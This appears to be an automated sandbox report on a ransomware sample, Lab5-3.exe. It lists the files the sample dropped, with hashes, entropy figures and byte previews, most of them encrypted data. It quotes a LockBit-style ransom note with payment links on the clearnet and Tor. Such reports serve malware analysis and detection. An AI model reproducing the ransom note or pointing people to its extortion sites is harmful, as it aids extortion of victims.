                                                                                                          Preview:_ V...I.~.C...-<.K>._.=..:.._....d.v`j.p.:.a.l ...p...........n.'6...'....V6.7....w7Ov..%...P.....0Oh.+.......z...xt.8$..)... ..^.~:.r<.hY....h.B.Y.k.*.%_.....\..h...(..-.{.C.B.:.......g:...x...n[.rE .E..;..ip..x(7D.@.....~K co.....3.3r;..X..9$...+..........h.q..HW.._yN.`-.%..y]g..j..Th.s....mm0S..<.``...Y.b...K....'..R.Sj....a.D+8.....'a...i...v.J.:..Y....hnB.t?..I..H..6..Y.6iF%.M.;1..mH3m....O...FO...f....D<......U..T.....9`5...#....uH.i...s?6..W[[>:..K..]NQ....T%<._.M.m.y.......1....kb.7.....JZ.".EE..1...U.-...>..h,.k.!.}........[Q..G.Os...."v...2Ie.U\.z...D..(.&..!./...........J..j...G7v....X[...Vj.^.n.....b~,U......-^...yMX..s.....r.V|....j..2.Oa"..v.x..*A....J.*B`..,}....R......$.S@..K...4..c.7........~.?mrp.,.>0Z7..Z...MtB.OqH...|....a1.os6t..K.&....c.$.}...^.....{.>q.t.....^...j....R!=..r...$..s../.....7.F......?..1..S..vD.vJ...... fc.#BV..6..p..A....K......,.Z..L.Fc...y..].R.......`.A...'2?}...^B.f ..._!.p...Q...Uq..WmM8=c=..D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26192
                                                                                                          Entropy (8bit):7.993010348257626
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:kmIY96w+4wtIIHKpe3je2Zt6mmbzKip5WGezIkfZ:kmdfMIXo6m4zK9HfZ
                                                                                                          MD5:C89E9701A5B642EE3C34F8F58DE3BD7F
                                                                                                          SHA1:73E111EB918D71127667D2B755B20FE7F4CC33C7
                                                                                                          SHA-256:7BCA58ED0F6E9DC3D49480ACD760FD40FB1E2CFEDDB24F220D050BA2CA9C2CFE
                                                                                                          SHA-512:54ABEFE0CD589D3E84A294002DE6984A2383E1D1420BEFC4AC96EA41F338D70B9056AC27A3FB0D0464C2C796156C7B31BC9FD2FACD4EB1158E0CE9C19BAC92CB
                                                                                                          Malicious:true
                                                                                                          Preview:...u..Nhc.......5.v..59.=..L."...$..5.1.Hco...?...K....l.]..\y.7t...m...V..I.U.$...&..p......^.....IBs.....M.K0mSv.?b2.fv....l.....s......OPf-.l..$.&*v......_...~..Z.".m.L...].z%V....M.NT...`.^........|.-<'..5..Y.v..,2.A9P...M..".8....^.1.D4..!u ........d....\._..........._.k.x..fu....O..r.N.`.S...3.$=j9..g...='%..M.6*2..._.....+....d./..U5.0.........A..:.v6&2[M....^.Z.AcaT}Z..........h...6....B.+.?he..........u....X.)n.{.....[......P+..~....t..............4...T........!...L.4J.k..!.%.+.!......0u.....X...3.5.v.DbN...hM.....)J....s!..o.;............P.2..1....I{..`.7.X @....B`..D@nTo...L.[w-tC.."]..Mm.".h....2@...KsG...s......vT.....N..Q.P.....D...Y.Z.q.1.7G..@.V.&.X.;Ab.I%..#.r...}.&.....1....1K&....... .c.v.x..N,-R.......n.WJ.\.d..WM.b.$:..}.M.~G..-.4.g.\..RglP..P..../....D..e'.am...L.<e.....>.Q......d$.&..Lu..(.:_...Ng8.....%....a=..J.E.r......,...........T.....]JR.J.U5..Z..H.<!...,..h..t...g-...p.,T'....B}...e..7;#=;.0}..E..*..1..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7424
                                                                                                          Entropy (8bit):7.977098693185291
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:HY15dZ6cPGZH9488uQTkr/UQONUvu8qW/ocG0Cb:Hsz6cOo88uAkr/UQRRqIocGtb
                                                                                                          MD5:4825DCDF170CA00A5EB16B34FCA3CF31
                                                                                                          SHA1:9938DA149C07A2BBF3FE34601587723E9095F3AF
                                                                                                          SHA-256:382B49EEB1CEFA3D2AF12424681482A63725496622CF6B38BB25F903C245D786
                                                                                                          SHA-512:02355F4597AB8BB05DBC51B8B6013A6B45F843DB61D846461C0AF827699455CD55C8DB498C63DD71008DDF9DD63A2F0B964D2813A3902AF7E564AFE341B92144
                                                                                                          Malicious:false
                                                                                                          Preview:Y.-...1Y..|k..Z.E..$...."`..)j.7b.h%.}...h.....0f7 .d..ho..{.=;........bf%D3...i..f..i/.f...D .7.0.....R...5.="......8.+....L...b2...p...r.]8#.........Q....@.4|.W0..0.b.kFc.S......"...U..1y!.....r...xq.L.....6.E.U..GM..oG..<.....W.i~.l.=m......ue....u.......8...'!-@....5.6..s.O_M=.N..%....z.vf}?d.9.e3.Q.4X.R....N.,...y.Y...C......-......... .......Qg...h..@..S.S.......m..<M.dY...sMs.....-M......\.N.?..TGV.......0I..r;w..=m.?..s.k!`...p..5...%$'IL..d.b .S.e.qHab.J.hyH*..;d.Y..G1J.........J...q..st ....{f.q....\>>.......&X.V.._O+8.......Q:...H.$.<9....N.e.$......O.]...BOy.....<...@.......+7.4j.t.s..&Y.?.}....q..d...Z..(....BL...h,.:bz=t$....h."..%.n%.W=.=.1.H.T.G....w.....^P.!.v...h5...|..0.....q....CD{..;.5..r...Uk....0.U.....Oc#*..Cf_6?{.N.....\..6..~.'.....F.+..!.H..#<...n....$2..8..X.x.#L..xfZ4'M..'..\#.....Yye....ei{.....r...x..Me....'1|R%..Zl:/9.....o|./D.'....!/q.\&.vbQ..L.Y.s..<4d.._...V....3..t.....".5...W-1..3.....D./.2&a....-.1T
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17408
                                                                                                          Entropy (8bit):7.990113408244577
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:1eJeICOKL8y6y7I/yATl1tE7G7y0KVEznZfQIzpbzPDzFgftb:13Ih82yURKVEznKIzBPefZ
                                                                                                          MD5:FEC7BAF604E43CA31A7A64E4152DB15C
                                                                                                          SHA1:62F35DA87F38E87AEF04A791964B94DB7A020A7F
                                                                                                          SHA-256:941FA9482168CB5F8E4C48F545F831C11E3EE0607A2EE0FCA556F780B3149735
                                                                                                          SHA-512:388A8B112FEF850FDF4679D7FE722D1E39457F2D649925A3591DBA0E90C129412614278E6417C5727ED8908B1FC7AC3DC15000AFA557BDE3966DC3BDCDA61DBE
                                                                                                          Malicious:true
                                                                                                          Preview:...X..........R:.9..H n.....%Y&P7%.b.e........=...)v}.....F.u....j..P.ua.;.......'.........PY\....k34....O....8.. !.~v...G{{.z....J.Ki>~.TL..D.uf..r..s.F8.....z...$y..E.8........=...E:...e./pm...w^Q.8........<9.)....n=.....5./...Fxj..GSN.._"Q.{..h|....d..EA$.....8...........|D...Q..Th..y..5...>....a.1....!.8....T`f+;?O...<G.n....q._.&b.3.8..,.t...9.. .C"|.F....@.._....|..T..A...X6....".\...5hO.b[..x."3.8.Wv... .Y.r[.'[VgM.s'..b.g9w.N.<B....Zx..}../..>....o.\9......{b..&...H.Kl..),..>3..7.GV...Vn.=V..:..|.5..Z.C....? n.+.H*.xw....I.....J.B.P.s.?.]G.Cy=w^......=f.4.P...7...>..il.I.......rX..DGa.w.`..Vt......x..ho.kOfi..xW.'....|5_.v.!.....%.>...{..n.%p..'....7...cHv6......g...Y@P(a9k.l....#.t.>^..;7..6.bS/...wx=u....H3..gqJ..37...OM.3..,...1X........%@<......W.{k....d@.8...]2X..cu.do..].....U...........)..'#...p..T.......i....Z..k..~....Gv...m..Y.....s...gRoL.M.u.Q....}c..H.....7.s.K..[....s...kN>w.lM3.Y..P....M.....2....\~/....Li
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3456
                                                                                                          Entropy (8bit):7.944015536802607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:R9rq7L+KMqsrHd5tkM5eOT0TGx0uKeY2ElUJ:RlKHaHd5tkM5vX0Cb
                                                                                                          MD5:B87C0781F062BD8E081F886C32E82D32
                                                                                                          SHA1:A53EFC4AF9B27901BDDA8D33FA8CA2986932CE52
                                                                                                          SHA-256:F35DE42511F43CEDDF7D33BA69DA15EDFB4CF9B7146405A6F4CA689D32D34BA5
                                                                                                          SHA-512:C2C52C81C7BC043F6A94CCE9618164F10D597E6A6684F458B3A6F1F529AAF94C3D288061A27295E2F6D2EE9A27EB8EC43A6E35C209554D801F0D3C811EAB9294
                                                                                                          Malicious:false
                                                                                                          Preview:0......6.. ..}.V......H....>...~"P...a.....)3...C..W.H.b.{..P.e....(....E*.N...F.IR3.S..#>..........L..9.*.....D6...;.k..6...Re.W.&.b;'...... .c.U...s."......5.....F.N.M\...Q.. .....718,...y....5..29....J.....).4XB.h...ECdY.B;N}6ji..a.@.<.d..... @6.......oG$y(..V....k@3(.p..M..t...i..t..\.W.$.....)N5.5......f.OE...B5...W.....?....M.&HYs.uvo...Ak5c...+)........*....'Dy=.>a.....$U......nbn.Z*..w.|.!vD..8..*....W..~....=D.&....q.....]...OC.M..9...X"........'.k.bA.....% ....1.&1%pjv`.......w..O.N....&.*..]J...\.; ..t.F....v..X..2..o.y.u.Z$.......iP.6[8G.NI ....`... .+...?....=.F....B.6../u@.w....F.R..I.....s...].R:.o.@...,D.a...#......-.Z5.1]....=!!{.xu..%.......3f.x.......E.+..F.*h.......Rn.Z..$....?...'..b,:+d....|`r..G,..1H.0..L.........K..~..W.K....5...,!@..%.p...M*"...2.!...Y.'7...>.h.g=....2aA.......".J...B.......;Y[..].8.'........OE.P%'.N.b..D9..x..6.&.A[.......h....T..I..<W.p....w.ij.ip8....N..Q.&..l...&I0.3/....:..D-.wEk9.H.~...x....#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.918938680728995
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UBZnGns4lsbHfUTid3hBaUoSGFcmeykEdEElU92i:Bs42oGx0uKeY2ElUJ
                                                                                                          MD5:8DF5C64B5AD7A0A5ABDA0DEC2079E9D4
                                                                                                          SHA1:380BB7C7A7002B7363B3531252FF1D9367ADA401
                                                                                                          SHA-256:BF6362BFDC91BC477DC546935082FF66ADBB083AF19490FF3B09AE02070ACD20
                                                                                                          SHA-512:9B6BE8A4F62B334BF6926ADF82456E340D1B0449B85C37BD87FD46C41BD5D44FC2883569448ECA672C13279D18B53297918727676B82EBBBA9E57EC8ACF58764
                                                                                                          Malicious:false
                                                                                                          Preview:a..8..f..]..:......C......U1%..pr..w..F....\le|.....Q..E1.E..8...;i:&.s.M....u......3.S.....n.....F.....Y.Zq.b.9.zM...4W.si.."p3.^..!...(`E.ru.a.v..6...\...y...R.NQ..n.~.>.#.<..jp.....P&.[u.&..UV._...x.6qB_.?.|K_.+..Y...d.R......UJ..}1y..H.._.....L.nk.S$..v./}lI........:..S..ULI.c)...o.y.&..~. ...~Z..n.X.ht(.I.27.#.NM...W=K....I..|.<.....u./..S]..m..f]H7:zd..'.".5!c.g.}....O.4..Lo.b..Nr..O...k........'........%...A...g7$...1.![.jpn...&.AD.....].P....7...a..K."..........09.7.X....l.._..?:J...4.....xxT...K..<..z6....:bBola..Z....Sk.i.|X......u:..,...6.....&i......K.j...x...|>P ..]t0..N.%.K..tm...|....... ....s.cD.SC.<......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.904572979221835
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wYf67btE9wqmX/HyikHfUTid3hBaUoSGFcmeykEdEElU92i:wYfOZEaq2Gx0uKeY2ElUJ
                                                                                                          MD5:69C2E77522B4D34A0831D811E02B0C5E
                                                                                                          SHA1:FCBC539D041B36F910E939F2D067555C2B3AF219
                                                                                                          SHA-256:4EB862CA7AF4484C244EE14F62EFCDC902305C8E948D97D88D79A4E54F8EEB02
                                                                                                          SHA-512:E02AFA1EE9189E8BA67DC6C5F3CC91B618174A14BE61D80CF4A60C33B8608562EEAFBA054CB0BB2CAC50690077B0E1EC3D3C1518AE866D9CFF38BC896B176EFE
                                                                                                          Malicious:false
                                                                                                          Preview:f......(..?d."..;.Q....t.H.....>..'.....Na .q.$#./..}..8_.|.....&.h.R6.!|o$.>.+.w..z_.B.......2.{v.l..%....&..k.sL.........t.d....A}.F...o.eENn.uh......y.b.....$.....c.d...5.(A....\..ac.0..x>.....Ab."A}eRm..].Z...R.:...@+..\.?(%(u.V.G.#..?...E......dd..8{...W%...l.LO^......>...Xn..f.....(B).%..E.s.f./.U.m.25.I...^.....d.&X....6#.....G.L...i..u-..!'..{....r..6...........4<.n.x...........!...FN.x......n=.P...0.....-.......5.#B+.-ndP....A..G"M... ......<..x....KV<....F..P(..rD2....k_..t z.... ....U=`!i.J...../QMF....".?.(...8g2..(6C.......X...Rr).C..9#....|...n.......!..W....7.........].Xk#.u......W.P...c....-q..*w...^....b...G2.....:.6.....Ko...J..v>RF...._..D..q.Ye.=..T..b...$_.G.M...qT........"9........9.)"H...x'.1a..!..H.+."-.Xn%.<,.O...{fD..a.c.7....Uj....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.898768722217432
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zQpYs6rD6eaxz8HfUTid3hBaUoSGFcmeykEdEElU92i:ELB7Gx0uKeY2ElUJ
                                                                                                          MD5:A21B9A173E056C0FA793DDAFC87E7E22
                                                                                                          SHA1:2DFF511030AE0BB7D259818FFE05A645300278E3
                                                                                                          SHA-256:BB83D2E6A4C99395C16F683A52F5D66E9385486F5DB0B802E9106F1030559181
                                                                                                          SHA-512:A61EFF5438F11652A2336D9D6578C3EE8BA022A58C2B650E12C81AE0C8FD4BA1350EEF38FF09FFAFD09DC7E86C2FA5F1A05686121D72BBB43D341A91D2A00A1B
                                                                                                          Malicious:false
                                                                                                          Preview:..,..o@..K.....c.I...oF.q!..U:.SE...;...3...qL./..1(....Y4..s...W.(.....rq.^.6s..,..<.D.f.+.....e.y......5. ...D......6.C^.!.\....\.tVYs....L.._..c...@....,g.......J..&.R...}.zA..u.L....p.,G/ .Z+.,j.hH..-3.....gQ.5.......U.},..K..S>.w..&[...~E.v....(8^%.....x[.YM..4:Ve..v.i.fv|9...D*:...b.U...A...f.[..W.c.{q...P..N.U...V...>.Z...t.6.I..{....].GNs.:.,...QD..q(2.C.._..Xb.7P...:.b..}..>.......&p2....?..{WHF...J. ....vO.f.5>..&.4j..t.*.....-7..9.$A:.....x......j.h#..X.L..2cl.wL.....0u.....i.{........ m.L.8.....u~....q........0t..@.....n.Q....f.!.Hb.....\...D.[..S.j.|~.;{gE.v.5YF.r...sv.V.7#!t...W.4.jq.q.G..o.'?Z....~..WE...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.908553778956543
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LeHxYkfOnz0zcBUouHfUTid3hBaUoSGFcmeykEdEElU92i:WKzrU0Gx0uKeY2ElUJ
                                                                                                          MD5:CFC8E86F58FABB4CAE57EF0C3930B209
                                                                                                          SHA1:07BCF5BB35EA1BDAF32990D66CE29FBB208438FE
                                                                                                          SHA-256:286946262E9FF187496DFA12FB920326F686E5A7279C1F5360CE9A96788D126B
                                                                                                          SHA-512:A1AEED445161DD1A8B244EE4DF743A616D41D291BBC931D1FD7B3716CD5BEB40909B43F8BD6C6E864E773B6D846F0F8E1B6B650DD014E34E2052B194FAD28583
                                                                                                          Malicious:false
                                                                                                          Preview:7D..S`..xD......|X.........-...r.50..../*......T#..[M.X.....[.....A.&g.'..H..0.....d..~3K............M..5.F.v.v.L...+z....]...V..9t.(I...y..{....I.Y......y....oA.;........^..g..~D...DRy,.T..U!.8.-(G.!za..(..b.u.=P....C..>h..W..%%.i.2z.....~..C..o./*.}.@/pd.....T..GY ...g+..Bd...*....p.. ...Aa...c..3k..:...,.}.c..y...4....3ub...BnU=>...W.v...W....Ec...[&/......0r.B.G..)..?..g.Mc......Z.Mi.8g"[:N.......7.......:M}....FQvB..(Y../D.........Av..!.X...;.+b.~.Cdr.}..z..r...NUf.ft.K P>L...\......r.*).{<.R......I:4mQ,...n.+..~.bwp.....%T3DO.}...jf...h..F...g.LK@.d.p.....V..`.E..n....Q..08%.4.........c\.3L.B.W.......9#t...:V.:G....vE'....S.7...(.=.....r.#L0&.a..cc.Tu..A..n..d...c.F.N.5g.a....X..t?..i....... ..o.3..FZD.:U.S.d.^.1h%xw..y.1.#...<.X....^.=.s...|.Gm(w..VH;.C...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.9232895098967795
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Q+fGlsHiMpFNPi7kVkHfUTid3hBaUoSGFcmeykEdEElU92i:QsGAPW7kVjGx0uKeY2ElUJ
                                                                                                          MD5:9ABD602F63D626C386A0A5D78CB2370B
                                                                                                          SHA1:80A5FDCDEF89BCF5C602F7DA450339EB2DD66731
                                                                                                          SHA-256:4EF7F91F642569D2EB95338C47FB67AA37B5B99330CAC0301D731937F5DF085E
                                                                                                          SHA-512:55C3D17B5D07A1DC62ECDB44FF65E6097691F03CBCD9F940B690A446710667247B6AF47D13383116D67DDB86831F2A798508B8280B98BCDD39B2ACEBD17ADAEB
                                                                                                          Malicious:false
                                                                                                          Preview:... o..A.b......TSjtC.....NH....&..<..`nb..El.....6E.+...,.J........[...V....1.0A.8X]..T/.>...W.+...Ad......:.&N*.hCs.#.+..,4)....$(..s..?c..y..8...wG......&.g...Lt.SSC4..|g..{......:aj....}...y4....G).D....D......\...)...H..z._....>Wj..r....I.yE.&.BB.........@*.4..Sp...|v|A9.}.. ....JX)KB.f.Bp...`VM......J..%..o...m5..i......@.d.C..^..?G..0..Z.g.......flZ..A.Tx..O_P..x.X..,2H...\.I..=".-.*K.!..r:..(.......%.1:z0..c..>.s,..I.n..{...*...[....V....#..L. ...X..>.|.BQ..._f..q..P..Y.FK..A...7e..H'..#{.-_t.F9...xU1y.... ..\;..M.">KC.@:Y[..|...<ER[.\.L...0-...>... ^...# .^Oh:...SmZ.[`.R.<.Sx...V.w.f5C..>T\*..(.r.t..[.>i.....8.Ck........h......Z.H....y....."9..W.v....aT.ac}V&.Z.N2.L?.nF.z.......!\..F .... (.v.U...z........'..E.."....F)..Vx.88...f.=v.S..e?..].8...tG..~Z.Ts..N.|......|...H;.......N.LZ..o.....\....OPW....]....Z..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:MIPSEB-LE ECOFF executable - version -84.97
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.937125464237795
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PS07FJ2eCKY3lv0S6U83PzUTe4+C/4cXs4xGHfUTid3hBaUoSGFcmeykEdEElU93:PS07/Ch01U8fz+ezCQcXsSZGx0uKeY2b
                                                                                                          MD5:1AF699BEFDADB82BF7CCD4DE1A7038C3
                                                                                                          SHA1:2165F84FEA6DA417C4A285BE2B4754159BA8F7DD
                                                                                                          SHA-256:ED47EECFF3A9C41CC234434B664AD8DF525A768CB3E132F6FB9D02470624CC10
                                                                                                          SHA-512:A144014FEA0EB570B072E3EDE54A1430B9585DCD8EDDA3D22C573D73731B0E2E40F8AF16667BD73AD627DD1CABEACC536A5D40FA48384F81E6F7191CE7290B43
                                                                                                          Malicious:false
                                                                                                          Preview:`..;.i}f........T..a..}._...qu..b.._.\.9..},......Ad.... *.i.N.QH..vh)1......l..).(..8...8.s.-..h.2O..E.;m...?(:.9q.f.h.Q.*....p..W.?..^......(;.M0..o...b._,..V......`m...z..B%C..^.M....*|.}...E...Os.a..B.r.!a.......T.....S..b.t3k..m.]y.f..#..@f..[. .S..n.....".D..q...@...z2.[L-...LJ...0X....IJ...(......b....q.p,.l.P...#&...h.......*.U..8...)~.4h.>.<...:..Q.R..H...t<~.u~.....@..%.T.X.\....KV.4...L..R.s...J'..8'..oD..A.GT\. kq.(..-.10&_x...M.+#1# 9..h.....-..z5.h.]_..........P..+..)<.;.E#.x...U.f..o.*.X!".(fyO1i.7..r..3..o.e.0W......+.f..+....,g.".....yN..\......P.....<4Z...,p..O.1.y)b.....x..T.P...J.t.Rl]r.=....4...o{..._..f..M.G..`.."Zy.&..Z...QF*.....p..8.:..K...p..Gu..s.ie......'..c.....c...>g/X..u)r...Z[......A..~..}_._ ......?.". ...\.&..%2M......r...%,.Gc1H.,9.W...je.-g.L....3!..1.8.c7A)...Q.......(.}...Q..,..Bmj..o.;.V..h.}.&.~.!."bV..N....$i...|....Q+...rO.>M.....q.R9./.......|.6..T....s..*..|N:.4.....K..(..d{.ah...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.907471049864326
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:eEWeZfhOLaxQh1bKwCvmVaHfUTid3hBaUoSGFcmeykEdEElU92i:eE7OLOeRKwCi1Gx0uKeY2ElUJ
                                                                                                          MD5:CAAF3A94A954396E30DFA2016B895F56
                                                                                                          SHA1:F86ED577D1F97B16B54AE54F01BF049DF2D8893E
                                                                                                          SHA-256:79BD5CFFE9481B226F3A04F925604CB67FC4B1A65AAE84D21A100E27579B5129
                                                                                                          SHA-512:7F32FDB63EC5EA96453644DF4878B958FDE6CC0747796328BC225F4F2A50F8680DE4C67EF9031CC472DD6957D0C4DF4F20F0FF3197AECAD24EB729E9204C2F29
                                                                                                          Malicious:false
                                                                                                          Preview:....@#....|....^.:.....7,.B....jh.ge...o..l3...~...o:.a..Et..d..CDq.).(~.....t.x.#..5...G...&!\i.......&.<o>...`.t!.1..T.[u....R...b......R..sh...T...'..j..W|.....{4....<r.K@.{t.^....X.z.p...^.*...........F.....H*m.A... #e[g...,..`ov...b....=...;k..0..q...Q..^4&q...b?,...yd..'....j....".........n6......~.xh..ZA.|.F..Z1P|.*57.....?P.:...A..?y.6.@.&.B.s.z.WO.<......}.....iy.d..n=..*..T.eE{[iS....9O.h._..}..]L.F.*.;3M.5...9..\......n.GMpNR.N+.0.....'...._i.k........E..=;HzMz..o........i..h(..e..)q.....O..'L....33....p.n.@"..[kh.+...B..P..Q./-.*..s-.#..k.+.$/f...Q'...*........*..[....E..&..l....b...3..0...:g.......Y..(b.....&.....iT.v..n3=..A...RPi.I/..&..."..B....x....]..6.W...C.......`.\.u....J.?..[.,..!..T...y....+Q...(`/...H...O.I.o.#:.....l.M....L.7..V.T..r.......dQ".m..r./....1..q.I.M..75....d.b.yY.V5g_.~r...>.@x&\@6..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.937404547161043
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:shJnqRVhBJ6fx9TTWBsPM16Zs5VHfUTid3hBaUoSGFcmeykEdEElU92i:eJn4BAfxJDPsis5uGx0uKeY2ElUJ
                                                                                                          MD5:5F5CBA4CADFF9F373BEDEA249DFB4E87
                                                                                                          SHA1:35D2CD98C2F82C80A08E060F0339F1169FB60FBA
                                                                                                          SHA-256:8C7CE45DFA67417470D92E3C16CA67D578F2FE8CBA78A75671A2EFEAC809FEDE
                                                                                                          SHA-512:DDDEF93DBDE29450F92EE94081EC6A2FFCD5D0FFE86E2A094966AA5A24E7FAD0DDAF70193B05590F8FA13ABFC4733298754119530072A49B6C411F999AAE8108
                                                                                                          Malicious:false
                                                                                                          Preview:d.=.A.q..............f..T.+....5..$;..6.......Bk....2...Nl....e..M..{.c........r.bkC]...D..}T._..tU....{..<....s......Er..Q.:..". .....b.y.H.;.M=..V?.H.=..q.X).50.J,E.jJ...&jj#..r>.-...Kp...D...G......d..@..up7`.;.a.z.d6"[#._....4P D.....b.HdC-..p.H....sge..Ea...0@..H.6...L...ON..r...o:+.,.d.n..W;..82&..*.=....0j."....U..$..v=.z!U..>.[.|..O.mBv'4.+.,.g.(.M.....Y{..k. .7.c..>tjB..h..s]j....(..3d9.....F.$"J[g.....2.$..y2.....,R"...j...I.B!8P]W..ra..:.u.6...A..2o...........".....\N...vu......|....M.$9>1.r...5.B.n.h..t.+a-I...`Y...&r^...:...y.2?.z,"OK9.He1....AUv?....\:.`...).Zp..UJ.X..\......h..d..i...z..t..P.E(*..o5(....&....z...b+J.#)..?P..F...a\S<.7Hy...4...0e.z.'-.`..o.;.)@_.(..=. H..p..S.4.b.xQ..(8.9...Nw..R<.s=^C.;g..(......1......(6.5..<1....i.....1o:......s..O...W...U..,...O.?a.L...$.m....S......T.}..o.z.;_x......U.^W.... .Y.V#t.-8ls...IT~./O..w....M..LN<...........Bd..7V.9..\.q..4..X..Q.};..2.m......e ..C5.._.0G.{.....~an.....R.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
